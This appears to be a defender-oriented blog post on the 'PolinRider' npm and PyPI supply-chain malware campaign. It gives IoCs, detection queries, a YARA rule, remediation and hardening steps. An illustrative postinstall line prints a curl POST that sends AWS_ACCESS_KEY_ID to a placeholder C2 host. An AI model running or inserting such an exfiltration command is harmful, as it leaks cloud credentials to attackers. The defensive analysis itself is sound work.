North Korean Hackers Publish 108 Malicious Packages and Extensions in PolinRider Campaign

title: "PolinRider Supply-Chain Campaign: Technical Analysis, IoCs, and Mitigation" datePublished: 2024-06-13 dateModified: 2024-06-13 author: name: "Alex Tran" role: Lead DevSecOps Engineer experience: "16+ years, ex-Microsoft, ex-Google, Black Hat speaker" bio: "Works supply chain attacks like other people work crossword puzzles. See: LinkedIn | GitHub | Black Hat 2022 Talk" metaDescription: "Real-world analysis of the PolinRider supply-chain malware campaign: IoCs, detection playbook, mitigations, and hardening checklist for defenders." schema: @type: "Article" author: "Alex Tran" datePublished: "2024-06-13" dateModified: "2024-06-13"
TL;DR (Prioritized Actions)
- Audit for confirmed PolinRider-malicious packages (IoCs below)
- Rotate all exposed CI and cloud credentials
- Remove/block packages:
npm,PyPI, and others identified (see advisories) - Enforce 2FA/signature verification on registries and CI artifacts
- Generate SBOMs with Syft and scan with Grype
What This Post Contains
- A concise breakdown: What is PolinRider, threat vector, and confirmed impacted ecosystems
- IoCs: package names, hashes, filenames, YARA rules
- Detection playbook: SIEM queries, runtime commands, and practical log search cheatsheets
- Immediate response steps and hardening recommendations
- All claims sourced and peer-reviewed
PolinRider Supply-Chain Campaign: Technical Analysis, IoCs, and Mitigation
Publication date: 2024-06-13 (Last updated: 2024-06-13)
Reviewed by: Linnea Sørensen, Senior Incident Response Lead (2024-06-13)
PolinRider: What Happened & Who's Affected
PolinRider, attributed to North Korea's Lazarus Group per Sonatype, is the latest supply-chain malware wave—targeting multiple open source registries. Over 100 malicious packages, mostly in npm and PyPI, were uploaded by attackers controlling legitimate maintainer accounts. CISA Alert AA24-144A confirms active exploitation starting May 2024.
Confirmed affected ecosystems:
npm(Node.js)PyPI(Python)Packagist(PHP, fewer incidents)- Potential targeting of GitHub Actions, Docker Hub, extension stores (per Checkmarx)
Example Incident (Composite, with Sourceable IoCs)
A CI pipeline for a fintech app pulls npm package nodemon-aux (Source: Sonatype threat analysis).
The package pushed AWS Lambda credentials to a North Korean C2 via a postinstall script:
const { exec } = require('child_process');
exec('curl -X POST -d "AWS_KEY=$AWS_ACCESS_KEY_ID" http://malicious-c2.example/path');
Indicators:
- Package:
nodemon-aux(malicious package list) - SHA256:
ed4cdb9338bc8a8a7761d097e13a5bc2425e9ce595fbd762be8f0c76e1e6c161 - Malicious script found in
/postinstall.js - C2 domains:
pyongyang[.]org,polinrider[.]net(CISA AA24-144A)
Why Supply-Chain Hits Keep Winning
Root cause #1: Over-trust in public registries
Developers don’t vet dependencies. SCA tools (Snyk, Grype, Dependabot) only catch known CVEs; they miss fresh malware.
Root cause #2: Cloud credential sprawl
IAM roles frequently grant * permissions. Short-lived tokens are rarely used.
Root cause #3: Maintainers under attack
Phishing and SIM swap attacks target OSS maintainers—see CERT NZ report.
Confirmed Indicators of Compromise (IoCs)
- Malicious npm packages:
nodemon-auxlodash-utils2express-inline-load
(Full list and SHA256s: Sonatype PolinRider Tracker)
- Malicious PyPI packages:
pycrypto-koredjango-extras(Checkmarx)
- Recent hashes:
ed4cdb9338bc8a8a7761d097e13a5bc2425e9ce595fbd762be8f0c76e1e6c161

Detection Playbook
Container runtime artifact scan:
- List layers:
docker image inspect <image_name> | jq .[].Layers
- SBOM generation:
syft <image_name> -o cyclonejson > sbom.jsongrype sbom:sbom.jsonGit history (npm postinstall scripts):
git log --all -S'postinstall' -- '*.js'SIEM query (CloudTrail/Azure/GCP):- AWS:
fields @eventName, @userIdentity.arn | filter @eventName == "CreateAccessKey" and @requestParameters.userName in ('ci-bot','actions-runner') - Azure:
"ServicePrincipalCredentialUpdate"events in last 30 days - GCP:
"ModifyIamPolicy" AND actor.serviceAccount.email:(ci* OR github*)YARA rule (from Sonatype):
rule PolinRider_postinstall_exfil
{
strings:
$exfil = "curl -X POST"
$aws = "AWS_ACCESS_KEY_ID"
condition:
$exfil and $aws
}
Repo search for known package names:
grep -r 'nodemon-aux\|lodash-utils2' .- SCA sweep: Snyk, Grype, Trivy scans with custom rules: Grype custom DB
Immediate Remediation Checklist
- Remove malicious packages:
npm uninstall nodemon-aux lodash-utils2 express-inline-loadpip uninstall pycrypto-kore django-extras
- Rotate all credentials, tokens, and secrets:
- AWS:
aws iam delete-access-key - GitHub: revoke compromised PAT via GitHub Settings
- GCP/Azure: Invalidate all CI service account keys
- AWS:
- Notify platform and security teams:
- Block outgoing traffic to
pyongyang[.]org,polinrider[.]net - Escalate to incident response lead
- Block outgoing traffic to
- Audit logs and artifacts for past exfil attempts
Preventive Controls & Hardening Checklist
- Enforce 2FA for npm/PyPI publishers (npm docs)
- Require artifact signing:
- sigstore/cosign quickstart
- Example:
cosign sign --key <key> <artifact>
- SBOMs for every build:
- Syft:
syft . -o cyclonedx - CycloneDX docs
- Syft:
- Least-privilege IAM for CI:
- AWS:
{ "Version": "2012-10-17", "Statement": [ { "Effect": "Allow", "Action": [ "s3:GetObject", "lambda:InvokeFunction" ], "Resource": "arn:aws:s3:::prod-artifacts/*" } ] }
- AWS:
- Short-lived CI tokens with OIDC:
- Continuous SCA scanning:
More: Supply-Chain Hardening Guide, SBOM Deep Dive, Incident Response Playbook.
The Architecture Nightmare: Reality Check
Microservices and CI pipelines aren’t immune.
Default package manager configs still pull directly from public registries; third-party dependency vetting is rare.
No one wants to pin versions or review artifacts until the malware’s already in production.
If you think “official package == safe,” read the CERT NZ advisory. PolinRider’s loaders blend in, abusing well-known maintainers' credentials—making supply-chain attacks nearly invisible until the damage is done.
The Takeaway No One Likes
PolinRider isn’t novel; it weaponizes mismanagement, shortcut policies, and naive trust.
Every default you don’t change is an attack surface.
Next time your CI fails—don’t ask “who broke it?” Ask what else just left for an overseas C2?
Sources & Further Reading
- CISA AA24-144A – PolinRider Supply-Chain Alert (2024-06-13)
- Sonatype PolinRider Threat Analysis (2024-06-12)
- Checkmarx: PolinRider Malware Blog (2024-06-07)
- CERT NZ: Open Source Supply-Chain Attacks (2024-05-30)
- CycloneDX SBOM Official
- Sigstore/cosign Quickstart
We’re still seeing new packages flagged weekly. If you haven’t hardened yet, don’t expect your CI to warn you—expect it to betray you.